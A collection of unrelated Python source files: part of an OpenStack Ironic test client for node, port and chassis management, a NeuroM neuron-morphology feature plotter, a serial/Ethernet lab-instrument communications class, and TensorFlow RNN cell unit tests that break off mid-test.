port['address'] = kwargs['address']
return self._create_request('ports', port)
@base.handle_errors
def delete_node(self, uuid):
"""Deletes a node having the specified UUID.
:param uuid: The unique identifier of the node.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('nodes', uuid)
@base.handle_errors
def delete_chassis(self, uuid):
"""Deletes a chassis having the specified UUID.
:param uuid: The unique identifier of the chassis.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('chassis', uuid)
@base.handle_errors
def delete_port(self, uuid):
"""Deletes a port having the specified UUID.
:param uuid: The unique identifier of the port.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('ports', uuid)
@base.handle_errors
def update_node(self, uuid, **kwargs):
"""Update the specified node.
:param uuid: The unique identifier of the node.
:return: A tuple with the server response and the updated node.
"""
node_attributes = ('properties/cpu_arch',
'properties/cpus',
'properties/local_gb',
'properties/memory_mb',
'driver',
'instance_uuid')
patch = self._make_patch(node_attributes, **kwargs)
return self._patch_request('nodes', uuid, patch)
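        # Illustrative sketch (not from the original source): _make_patch is
        # assumed to turn keyword arguments into a JSON-patch list, so a call
        # such as update_node(uuid, driver='agent_ipmitool') (hypothetical
        # driver name) would likely produce something like
        # [{'op': 'replace', 'path': '/driver', 'value': 'agent_ipmitool'}]
        # before it is sent via _patch_request.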
@base.handle_errors
def update_chassis(self, uuid, **kwargs):
"""Update the specified chassis.
:param uuid: The unique identifier of the chassis.
:return: A tuple with the server response and the updated chassis.
"""
chassis_attributes = ('description',)
patch = self._make_patch(chassis_attributes, **kwargs)
return self._patch_request('chassis', uuid, patch)
@base.handle_errors
def update_port(self, uuid, patch):
"""Update the specified port.
:param uuid: The unique identifier of the port.
:param patch: List of dicts representing json patches.
:return: A tuple with the server response and the updated port.
"""
return self._patch_request('ports', uuid, patch)
@base.handle_errors
def set_node_power_state(self, node_uuid, state):
"""Set power state of the specified node.
:param node_uuid: The unique identifier of the node.
        :param state: Desired state to set (on/off/reboot).
"""
target = {'target': state}
return self._put_request('nodes/%s/states/power' % node_uuid,
target)
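        # Hedged usage sketch: the body PUT to /nodes/<uuid>/states/power is
        # simply {'target': state}, e.g. set_node_power_state(node_uuid,
        # 'power off') would send {'target': 'power off'}; the exact state
        # strings accepted depend on the Ironic API version and are not
        # defined in this file.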
@base.handle_errors
def validate_driver_interface(self, node_uuid):
"""Get all driver interfaces of a specific node.
        :param node_uuid: Unique identifier of the node in UUID format.
"""
uri = '{pref}/{res}/{uuid}/{postf}'.format(pref=self.uri_prefix,
res='nodes',
uuid=node_uuid,
postf='validate')
return self._show_request('nodes', node_uuid, uri=uri)
@base.handle_errors
def set_node_boot_device(self, node_uuid, boot_device, persistent=False):
"""Set the boot device of the specified node.
:param node_uuid: The unique identifier of the node.
:param boot_device: The boot device name.
:param persistent: Boolean value. True if the boot device will
persist to all future boots, False if not.
Default: False.
"""
request = {'boot_device': boot_device, 'persistent': persistent}
resp, body = self._put_request('nodes/%s/management/boot_device' %
node_uuid, request)
self.expected_success(204, resp.status)
return body
@base.handle_errors
def get_node_boot_device(self, node_uuid):
"""Get the current boot device of the specified node.
:param node_uuid: The unique identifier of the node.
"""
path = 'nodes/%s/management/boot_device' % node_uuid
resp, body = self._list_request(path)
self.expected_success(200, resp.status)
return body
@base.handle_errors
def get_node_supported_boot_devices(self, node_uuid):
"""Get the supported boot devices of the specified node.
:param node_uuid: The unique identifier of the node.
"""
path = 'nodes/%s/management/boot_device/supported' % node_uuid
resp, body = self._list_request(path)
self.expected_success(200, resp.status)
return body
@base.handle_errors
def get_console(self, node_uuid):
"""Get connection information about the console.
:param node_uuid: Unique identifier of the node in UUID format.
"""
resp, body = self._show_request('nodes/states/console', node_uuid)
self.expected_success(200, resp.status)
return resp, body
@base.handle_errors
def set_console_mode(self, node_uuid, enabled):
"""Start and stop the node console.
:param node_uuid: Unique identifier of the node in UUID format.
:param enabled: Boolean value; whether to enable or disable the
console.
"""
enabled = {'enabled': enabled}
resp, body = self._put_request('nodes/%s/states/console' % node_uuid,
enabled)
self.expected_success(202, resp.status)
return resp, body
|
|
#!/usr/bin/env python
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Plot a selection of features from a morphology population."""
from collections import defaultdict
from collections import namedtuple
import sys
import json
import argparse
import numpy as np
import neurom as nm
from neurom.view import matplotlib_utils
import scipy.stats as _st
from matplotlib.backends.backend_pdf import PdfPages
DISTS = {
'normal': lambda p, bins: _st.norm.pdf(bins, p['mu'], p['sigma']),
'uniform': lambda p, bins: _st.uniform.pdf(bins, p['min'], p['max'] - p['min']),
'constant': lambda p, bins: None
}
def bin_centers(bin_edges):
"""Return array of bin centers given an array of bin edges"""
return (bin_edges[1:] + bin_edges[:-1]) / 2.0
def bin_widths(bin_edges):
"""Return array of bin widths given an array of bin edges"""
return bin_edges[1:] - bin_edges[:-1]
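# Illustrative example (added for clarity, not part of the original module):
# for bin_edges = np.array([0.0, 1.0, 2.0, 4.0]),
#   bin_centers(bin_edges) -> array([0.5, 1.5, 3.0])
#   bin_widths(bin_edges)  -> array([1.0, 1.0, 2.0])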
def histo_entries(histo):
"""Calculate the number of entries in a histogram
This is the sum of bin height * bin width
"""
bw = bin_widths(histo[1])
return np.sum(histo[0] * bw)
def dist_points(bin_edges, d):
"""Return an array of values according to a distribution
Points are calculated at the center of each bin
"""
bc = bin_centers(bin_edges)
if d is not None:
d = DISTS[d['type']](d, bc)
return d, bc
def calc_limits(data, dist=None, padding=0.25):
"""Calculate a suitable range for a histogram
Returns:
tuple of (min, max)
"""
dmin = sys.float_info.max if dist is None else dist.get('min',
sys.float_info.max)
dmax = sys.float_info.min if dist is None else dist.get('max',
sys.float_info.min)
_min = min(min(data), dmin)
_max = max(max(data), dmax)
padding = padding * (_max - _min)
return _min - padding, _max + padding
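# Illustrative example (added comment): calc_limits([1.0, 3.0], dist=None,
# padding=0.25) spans (1.0, 3.0), pads by 0.25 * 2.0 = 0.5 on each side and
# returns (0.5, 3.5).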
# Neurite types of interest
NEURITES_ = (nm.NeuriteType.axon,
nm.NeuriteType.apical_dendrite,
nm.NeuriteType.basal_dendrite,)
# Features of interest
FEATURES = ('segment_lengths',
'section_lengths',
'section_path_distances',
'section_radial_distances',
'trunk_origin_radii')
def load_neurite_features(filepath):
"""Unpack relevant data into megadict."""
stuff = defaultdict(lambda: defaultdict(list))
morphs = nm.load_morphologies(filepath)
# unpack data into arrays
for m in morphs:
for t in NEURITES_:
for feat in FEATURES:
stuff[feat][str(t).split('.')[1]].extend(
nm.get(feat, m, neurite_type=t)
)
return stuff
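# Hedged sketch of the returned structure: stuff['section_lengths']['axon'] is
# a list of per-section lengths pooled over every morphology in the population,
# and similarly for the other FEATURES / NEURITES_ combinations.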
Plot = namedtuple('Plot', 'fig, ax')
def parse_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(
description='Morphology feature plotter',
epilog='Note: Makes plots of various features and superimposes\
input distributions. Plots are saved to PDF file.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('datapath',
help='Morphology data directory path')
parser.add_argument('--mtypeconfig',
required=True,
help='Get mtype JSON configuration file')
parser.add_argument('--output',
default='plots.pdf',
help='Output PDF file name')
return parser.parse_args()
def main(data_dir, mtype_file): # pylint: disable=too-many-locals
"""Run the stuff."""
# data structure to store results
stuff = load_neurite_features(data_dir)
    with open(mtype_file) as f:
        sim_params = json.load(f)
# load histograms, distribution parameter sets and figures into arrays.
# To plot figures, do
# plots[i].fig.show()
# To modify an axis, do
# plots[i].ax.something()
_plots = []
for feat, d in stuff.items():
for typ, data in d.items():
dist = sim_params['components'][typ].get(feat, None)
print('Type = %s, Feature = %s, Distribution = %s' % (typ, feat, dist))
# if no data available, skip this feature
if not data:
print("No data found for feature %s (%s)" % (feat, typ))
continue
# print 'DATA', data
num_bins = 100
limits = calc_limits(data, dist)
bin_edges = np.linspace(limits[0], limits[1], num_bins + 1)
            histo = np.histogram(data, bin_edges, density=True)
print('PLOT LIMITS:', limits)
# print 'DATA:', data
# print 'BIN HEIGHT', histo[0]
plot = Plot(*matplotlib_utils.get_figure(new_fig=True, subplot=111))
plot.ax.set_xlim(*limits)
plot.ax.bar(histo[1][:-1], histo[0], width=bin_widths(histo[1]))
dp, bc = dist_points(histo[1], dist)
# print 'BIN CENTERS:', bc, len(bc)
if dp is not None:
# print 'DIST POINTS:', dp, len(dp)
plot.ax.plot(bc, dp, 'r*')
plot.ax.set_title('%s (%s)' % (feat, typ))
_plots.append(plot)
return _plots
if __name__ == '__main__':
args = parse_args()
print('MTYPE FILE:', args.mtypeconfig)
plots = main(args.datapath, args.mtypeconfig)
pp = PdfPages(args.output)
for p in plots:
pp.savefig(p.fig)
pp.close()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import with_statement
from __future__ import division
import sys
import os
import time
import glob
import serial
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import struct
import re
import urllib2
import urlparse
import pprint
from smartFormat import smartFormat, simpleFormat
if os.name == 'nt':
    import scanwin32
if os.name == 'posix':
    pass
def wstdout(s):
sys.stdout.write(s)
sys.stdout.flush()
def wstderr(s):
sys.stderr.write(s)
sys.stderr.flush()
PPstderr = pprint.PrettyPrinter(indent=2, width=80, depth=None, stream=sys.stderr)
PPstdout = pprint.PrettyPrinter(indent=2, width=80, depth=None, stream=sys.stdout)
#===============================================================================
# Module exception definitions
#===============================================================================
class CommProtocolError(Exception):
pass
class MethodCallError(CommProtocolError):
pass
class InvalidArgumentError(CommProtocolError):
pass
class ArgumentConversionError(InvalidArgumentError):
pass
class ArgumentLengthError(InvalidArgumentError):
pass
class UnexpectedArgumentError(InvalidArgumentError):
pass
class InvalidResponseError(CommProtocolError):
pass
class ResponseConversionError(InvalidResponseError):
pass
class ResponseLengthError(InvalidResponseError):
pass
class UnexpectedResponseError(InvalidResponseError):
pass
class UnsupportedOSError(CommProtocolError):
pass
class InvalidCommandError(CommProtocolError):
pass
class ChecksumMismatchError(CommProtocolError):
pass
class SerialPortError(CommProtocolError):
pass
class InstrumentComms(object):
def __init__(self, useSerial=True, useEthernet=False,
ipAddress=None, ethPort=80,
serialPortName=None,
baud=19200, bytesize=8, parity='N', stopbits=1,
timeout=2, xonxoff=False, rtscts=False, dsrdtr=False,
serCmdPrefix="", serCmdTerm='\r', serIdnCmd='*IDN?',
ethCmdPrefix='COMMAND=', ethCmdTerm='\r\ngpibsend=Send\r\n',
ethDataRE=re.compile('.*<TEXTAREA.*>(.*)</TEXTAREA>'),
ethIdnCmd='*IDN?',
argSep=""):
self.config = {}
self.data = {}
self.lowerRegex = re.compile("[a-z]")
self.useSerial = useSerial
self.useEthernet = useEthernet
        if self.useEthernet and ipAddress is None:
            raise CommProtocolError("IP address must be supplied")
        else:
            self.ipAddress = ipAddress
        if self.useEthernet and ethPort is None:
            raise CommProtocolError("Ethernet port must be supplied")
        else:
            self.ethPort = ethPort
self.controllerSPName = serialPortName
if self.useSerial:
self.serialPort = serial.Serial()
else:
self.serialPort = None
# Common baud rates: 115200, 38400, 19200, 9600, 4800, 2400, 1200
self.BAUDRATE = baud
self.BYTESIZE = bytesize
self.PARITY = parity
self.STOPBITS = stopbits
self.SERIALTIMEOUT = timeout
self.XONXOFF = xonxoff
self.RTSCTS = rtscts
self.DSRDTR = dsrdtr
self.SERCMD_TERM = serCmdTerm
self.SERCMD_TERM_LEN = len(self.SERCMD_TERM)
self.SERCMD_PREFIX = serCmdPrefix
self.ETHCMD_PREFIX = ethCmdPrefix
self.ETHCMD_TERM = ethCmdTerm
self.ETHDATA_RE = ethDataRE
self.CMD_ARG_SEP = argSep
def scanSerialPorts(self, debug=False):
if not self.useSerial:
raise Exception("Serial port operations not allowed")
if self.serialPort.isOpen():
self.serialPort.flushInput()
self.serialPort.flushOutput()
self.serialPort.close()
        if os.name == 'nt':
            possibleSerPorts = [cp[1] for cp in sorted(scanwin32.comports())]
        elif os.name == 'posix':
possibleSerPorts = glob.glob('/dev/ttyS*') + \
glob.glob('/dev/ttyUSB*') + glob.glob('/dev/ttyACM*')
else:
raise UnsupportedOSError("Operating system " + os.name +
" unsupported.")
serPorts = []
for psp in possibleSerPorts:
try:
#-- Open port with the settings we will use, to make sure these
# work on the given port
self.openPort(psp)
sp = self.serialPort
spDict = {}
spDict['name'] = sp.portstr
spDict['supportedBaudrates'] = sp.getSupportedBaudrates()
spDict['supportedByteSizes'] = sp.getSupportedByteSizes()
spDict['supportedParities'] = sp.getSupportedParities()
spDict['supportedStopbits'] = sp.getSupportedStopbits()
self.__closeSerialPort()
serPorts.append(spDict)
except: # serial.Serial.SerialException, err:
#wstderr('ERROR: %s\n' % str(err))
pass
self.serPorts = serPorts
if debug:
wstderr("\nD0 --> serPorts:\n"+PPstderr.pformat(serPorts)+"\n\n")
return self.serPorts
def simpleSerial(self, debug=False):
allSP = self.scanSerialPorts(debug)
self.controllerSPName = allSP[0]['name']
self.openPort()
def findInstrument(self, mfr=None, model=None, idnStr=None,
ethMAC=None, ethHostname=None,
searchSerial=True, searchEthernet=True,
searchGPIB=False, idnQueryStr="*IDN?",
debug=False):
instrumentMatches = {'serial':[], 'ethernet':[], 'GPIB':[]}
if searchSerial:
#-- Search serial ports for the instrument
allSP = self.scanSerialPorts(debug)
for spNum in range(len(allSP)):
isMatch = True
self.openPort(allSP[spNum]['name'])
if mfr or model or idnStr:
try:
idn = self.query(idnQueryStr)
except:
isMatch = False
continue
if mfr and not np.any([mfr.upper() in s.upper() for s in
idn.split(",")]):
isMatch = False
if model and not np.any([model.upper() in s.upper() for s in
idn.split(",")]):
isMatch = False
if idnStr and not np.any([idnStr.upper() in s.upper()
for s in idn.split(",")]):
isMatch = False
if ethMAC:
try:
MACAddy = self.query("ETHERnet:ENETADDress?")
except:
isMatch = False
continue
if ethHostname:
try:
hostname = self.query("ETHERnet:NAME?")
except:
continue
if mfr and not np.any([mfr.upper() in s.upper() for s in
idn.split(",")]):
isMatch = False
if isMatch:
instrumentMatches['serial'].append(self.controllerSPName)
if searchEthernet:
pass
if searchGPIB:
pass
if debug:
wstderr("\nD0 --> instrumentMatches:\n" +
PPstderr.pformat(instrumentMatches) + "\n\n")
return instrumentMatches
def __openSerialPort(self, serPortName=None):
if not self.useSerial:
raise Exception("Serial port operations not allowed")
self.__closeSerialPort()
        if serPortName is None:
            serPortName = self.controllerSPName
        if self.controllerSPName is None:
raise SerialPortError("No valid serial port found")
self.serialPort = serial.Serial(
serPortName, baudrate=self.BAUDRATE, bytesize=self.BYTESIZE,
parity=self.PARITY, stopbits=self.STOPBITS,
timeout=self.SERIALTIMEOUT, xonxoff=self.XONXOFF,
rtscts=self.RTSCTS, writeTimeout=self.SERIALTIMEOUT,
dsrdtr=self.DSRDTR, interCharTimeout=self.SERIALTIMEOUT
)
self.serialPort.flushInput()
self.serialPort.flushOutput()
return self.serialPort
def __closeSerialPort(self):
if self.serialPort.isOpen():
self.serialPort.close()
self.serialPortOpen = False
def __serialSendCommand(self, command, upperCaseOnly=True):
if not self.isPortOpen():
self.openPort()
if upperCaseOnly:
command2 = self.lowerRegex.sub('', command)
else:
command2 = command
#wstderr("\""+ command2 +"\"\n")
fullString = self.SERCMD_PREFIX + command2 + self.SERCMD_TERM
#-- Send command
#print "="*80
#print "Sending..."
#print "command: '" + command + "' translated to '" + command2 + "'"
#print ""
#sys.stdout.flush()
#-- Send first char, wait for 1 second, then send remaining chars
self.serialPort.write(fullString)
self.serialPort.flush()
def __serialReceiveASCIIResponse(self, timeout=0):
t0 = time.time()
if not self.serialPort.isOpen():
self.openPort()
# DEBUG
#print "Receiving..."
#sys.stdout.flush()
try:
response = ''
char = ''
while True:
char = self.serialPort.read(1)
if char == "":
raise Exception("Serial port timeout exceeded")
response += char
# DEBUG
#sys.stdout.write('\n"' + str(response) + '"\n"')
#sys.stdout.flush()
if response[-self.SERCMD_TERM_LEN:] == self.SERCMD_TERM:
response = response[0:-self.SERCMD_TERM_LEN]
# DEBUG
#sys.stdout.write('breaking!')
#sys.stdout.flush()
break
if (timeout > 0) and (time.time()-t0 > timeout):
raise Exception("Response timeout exceeded")
except:
# DEBUG
#print "ERROR getting response"
#sys.stdout.flush()
raise Exception("ERROR getting response")
if len(response) < 1000:
pass
# DEBUG
#print 'response: >>', response
#sys.stdout.flush()
else:
pass
# DEBUG
#print 'response[0:500]', response[0:500]
#sys.stdout.flush()
# DEBUG
#print 'response len >>', len(response)
#sys.stdout.flush()
return response
def __serialReceiveBinaryResponse(self, timeout=0):
t0 = time.time()
if not self.isPortOpen():
self.openPort()
try:
response = ''
char = ''
#-- Try twice to receive initial char: should be '#'
goodToGo = False
for n in range(2):
if self.serialPort.read(1) == '#':
goodToGo = True
break
if not goodToGo:
raise Exception(
"ERROR -- initial char in binary receive not '#'")
#-- Receive char that indicates how many ascii characters to get
# that will tell the length of the binary data to be transferred
dataLengthNumberLength = int(self.serialPort.read(1))
#print dataLengthNumberLength
lengthStr = ''
for n in range(dataLengthNumberLength):
lengthStr += self.serialPort.read(1)
dataLength = int(lengthStr)
#print dataLength
data = ''
bytesToRead = dataLength
n = 0
while True:
data += self.serialPort.read(1)
n += 1
if n == bytesToRead:
break
#-- Read the command termination character or sequence
terminator = ''
for n in range(self.SERCMD_TERM_LEN):
terminator += self.serialPort.read(1)
if (timeout > 0) and (time.time()-t0 > timeout):
raise Exception("Response timeout exceeded")
except:
raise Exception("ERROR getting response")
if len(data) < 500:
pass
else:
pass
return data
def __ethernetQuery(self, command, returnResponse=True, upperCaseOnly=True,
timeout=0):
# TODO: Implement timeout
url = 'http://' + self.ipAddress + '/Comm.html' #+ str(self.ethPort)
if upperCaseOnly:
command2 = self.lowerRegex.sub('', command)
else:
command2 = command
#wstderr("\""+ command2 +"\"\n")
httpPostSendStr = self.ETHCMD_PREFIX + command2 + self.ETHCMD_TERM
fullRequest = urllib2.Request(url, httpPostSendStr)
cnxn = urllib2.urlopen(fullRequest)
httpPostReturnStr = cnxn.read()
#wstdout('-'*80 + '\n' + str(httpPostSendStr) + '\n')
#wstdout(str(httpPostReturnStr) + '\n' )
if returnResponse:
response = self.ETHDATA_RE.findall(httpPostReturnStr)[0]
#wstdout(str(response) + '-'*80 + '\n')
return response
else:#
pass
#wstdout('-'*80 + '\n')
def __ethernetBinaryQuery(self, command, returnResponse=True, timeout=0):
"""??? -- Haven't figured out how to do binary data via HTTP post;
possibly if I used a different command altogether (see web
interface, as they have a data download function there)"""
# TODO: Implement timeout
url = 'http://' + self.ipAddress + '/Comm.html' #+ str(self.ethPort)
s = self.ETHCMD_PREFIX + command + self.ETHCMD_TERM
httpPostSendStr = s
fullRequest = urllib2.Request(url, httpPostSendStr)
cnxn = urllib2.urlopen(fullRequest)
httpPostReturnStr = cnxn.read()
#httpPostReturnStr += cnxn.read()
#httpPostReturnStr += cnxn.read()
#wstdout('-'*80 + '\n' + str(httpPostSendStr) + '\n')
#wstdout(str(httpPostReturnStr) + '\n' )
if returnResponse:
response = self.ETHDATA_RE.findall(httpPostReturnStr)[0]
#wstdout(str(response) + '-'*80 + '\n')
return response
else:
pass
#wstdout('-'*80 + '\n')
def receiveBinaryResponse(self, timeout=0):
if self.useSerial:
return self.__serialReceiveBinaryResponse(timeout=timeout)
        else:
            # There is no Ethernet binary-receive implementation in this class;
            # fail explicitly instead of calling a non-existent method.
            raise Exception("Binary receive not implemented for Ethernet comms")
def isPortOpen(self):
if self.useEthernet:
return True
else:
return self.serialPort.isOpen()
def openPort(self, spName=None):
        if spName is not None:
self.controllerSPName = spName
if self.useEthernet:
return
self.__openSerialPort()
def closePort(self):
if self.useEthernet:
return
self.__closeSerialPort()
def tell(self, command):
if self.useSerial:
self.__serialSendCommand(command)
else:
self.__ethernetQuery(command, returnResponse=False)
def query(self, command, timeout=0):
if self.useSerial:
self.__serialSendCommand(command)
return self.__serialReceiveASCIIResponse(timeout=timeout)
else:
return self.__ethernetQuery(command, timeout=timeout)
def listen(self, timeout=0):
if self.useSerial:
return self.__serialReceiveASCIIResponse(timeout=timeout)
else:
raise Exception("Cannot just listen while using Ethernet comms")
def binQuery(self, command, timeout=0):
if self.useSerial:
self.__serialSendCommand(command)
return self.__serialReceiveBinaryResponse(timeout=timeout)
else:
return self.__ethernetQuery(command, timeout=timeout)
def binListen(self, timeout=0):
if self.useSerial:
return self.receiveBinaryResponse(timeout=timeout)
else:
raise Exception("Cannot just listen while using Ethernet comms")
if __name__ == "__main__":
tk = InstrumentComms()
#tk.testPlot(4)
#plt.show()
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for RNN cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
import tensorflow as tf
# TODO(ebrevdo): Remove once _linear is fully deprecated.
# pylint: disable=protected-access
from tensorflow.python.ops.rnn_cell import _linear as linear
# pylint: enable=protected-access
class RNNCellTest(tf.test.TestCase):
def testLinear(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(1.0)):
x = tf.zeros([1, 2])
l = linear([x], 2, False)
sess.run([tf.initialize_all_variables()])
res = sess.run([l], {x.name: np.array([[1., 2.]])})
self.assertAllClose(res[0], [[3.0, 3.0]])
# Checks prevent you from accidentally creating a shared function.
with self.assertRaises(ValueError):
l1 = linear([x], 2, False)
# But you can create a new one in a new scope and share the variables.
with tf.variable_scope("l1") as new_scope:
l1 = linear([x], 2, False)
with tf.variable_scope(new_scope, reuse=True):
linear([l1], 2, False)
self.assertEqual(len(tf.trainable_variables()), 2)
def testBasicRNNCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 2])
g, _ = tf.nn.rnn_cell.BasicRNNCell(2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g], {x.name: np.array([[1., 1.]]),
m.name: np.array([[0.1, 0.1]])})
self.assertEqual(res[0].shape, (1, 2))
def testGRUCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 2])
g, _ = tf.nn.rnn_cell.GRUCell(2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g], {x.name: np.array([[1., 1.]]),
m.name: np.array([[0.1, 0.1]])})
# Smoke test
self.assertAllClose(res[0], [[0.175991, 0.175991]])
with tf.variable_scope("other", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3]) # Test GRUCell with input_size != num_units.
m = tf.zeros([1, 2])
g, _ = tf.nn.rnn_cell.GRUCell(2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g], {x.name: np.array([[1., 1., 1.]]),
m.name: np.array([[0.1, 0.1]])})
# Smoke test
self.assertAllClose(res[0], [[0.156736, 0.156736]])
def testBasicLSTMCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 8])
g, out_m = tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.BasicLSTMCell(2)] * 2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, out_m], {x.name: np.array([[1., 1.]]),
m.name: 0.1 * np.ones([1, 8])})
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res[0], [[0.24024698, 0.24024698]])
expected_mem = np.array([[0.68967271, 0.68967271,
0.44848421, 0.44848421,
0.39897051, 0.39897051,
0.24024698, 0.24024698]])
self.assertAllClose(res[1], expected_mem)
with tf.variable_scope("other", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3]) # Test BasicLSTMCell with input_size != num_units.
m = tf.zeros([1, 4])
g, out_m = tf.nn.rnn_cell.BasicLSTMCell(2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, out_m], {x.name: np.array([[1., 1., 1.]]),
m.name: 0.1 * np.ones([1, 4])})
self.assertEqual(len(res), 2)
def testBasicLSTMCellStateTupleType(self):
with self.test_session():
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m0 = (tf.zeros([1, 2]),) * 2
m1 = (tf.zeros([1, 2]),) * 2
cell = tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.BasicLSTMCell(2, state_is_tuple=True)] * 2,
state_is_tuple=True)
self.assertTrue(isinstance(cell.state_size, tuple))
self.assertTrue(isinstance(cell.state_size[0],
tf.nn.rnn_cell.LSTMStateTuple))
self.assertTrue(isinstance(cell.state_size[1],
tf.nn.rnn_cell.LSTMStateTuple))
# Pass in regular tuples
_, (out_m0, out_m1) = cell(x, (m0, m1))
self.assertTrue(isinstance(out_m0,
tf.nn.rnn_cell.LSTMStateTuple))
self.assertTrue(isinstance(out_m1,
tf.nn.rnn_cell.LSTMStateTuple))
# Pass in LSTMStateTuples
tf.get_variable_scope().reuse_variables()
zero_state = cell.zero_state(1, tf.float32)
self.assertTrue(isinstance(zero_state, tuple))
self.assertTrue(isinstance(zero_state[0],
tf.nn.rnn_cell.LSTMStateTuple))
self.assertTrue(isinstance(zero_state[1],
tf.nn.rnn_cell.LSTMStateTuple))
_, (out_m0, out_m1) = cell(x, zero_state)
self.assertTrue(
isinstance(out_m0, tf.nn.rnn_cell.LSTMStateTuple))
self.assertTrue(
isinstance(out_m1, tf.nn.rnn_cell.LSTMStateTuple))
def testBasicLSTMCellWithStateTuple(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m0 = tf.zeros([1, 4])
m1 = tf.zeros([1, 4])
cell = tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.BasicLSTMCell(2)] * 2, state_is_tuple=True)
g, (out_m0, out_m1) = cell(x, (m0, m1))
sess.run([tf.initialize_all_variables()])
res = sess.run([g, out_m0, out_m1],
{x.name: np.array([[1., 1.]]),
m0.name: 0.1 * np.ones([1, 4]),
m1.name: 0.1 * np.ones([1, 4])})
self.assertEqual(len(res), 3)
# The numbers in results were not calculated, this is just a smoke test.
# Note, however, these values should match the original
# version having state_is_tuple=False.
self.assertAllClose(res[0], [[0.24024698, 0.24024698]])
expected_mem0 = np.array([[0.68967271, 0.68967271,
0.44848421, 0.44848421]])
expected_mem1 = np.array([[0.39897051, 0.39897051,
0.24024698, 0.24024698]])
self.assertAllClose(res[1], expected_mem0)
self.assertAllClose(res[2], expected_mem1)
def testLSTMCell(self):
with self.test_session() as sess:
num_units = 8
num_proj = 6
state_size = num_units + num_proj
batch_size = 3
input_size = 2
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([batch_size, input_size])
m = tf.zeros([batch_size, state_size])
cell = tf.nn.rnn_cell.LSTMCell(
num_units=num_units, num_proj=num_proj, forget_bias=1.0)
output, state = cell(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state],
{x.name: np.array([[1., 1.], [2., 2.], [3., 3.]]),
m.name: 0.1 * np.ones((batch_size, state_size))})
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape, (batch_size, num_proj))
self.assertEqual(res[1].shape, (batch_size, state_size))
# Different inputs so different outputs and states
for i in range(1, batch_size):
self.assertTrue(
float(np.linalg.norm((res[0][0, :] - res[0][i, :]))) > 1e-6)
self.assertTrue(
float(np.linalg.norm((res[1][0, :] - res[1][i, :]))) > 1e-6)
def testOutputProjectionWrapper(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3])
m = tf.zeros([1, 3])
cell = tf.nn.rnn_cell.OutputProjectionWrapper(
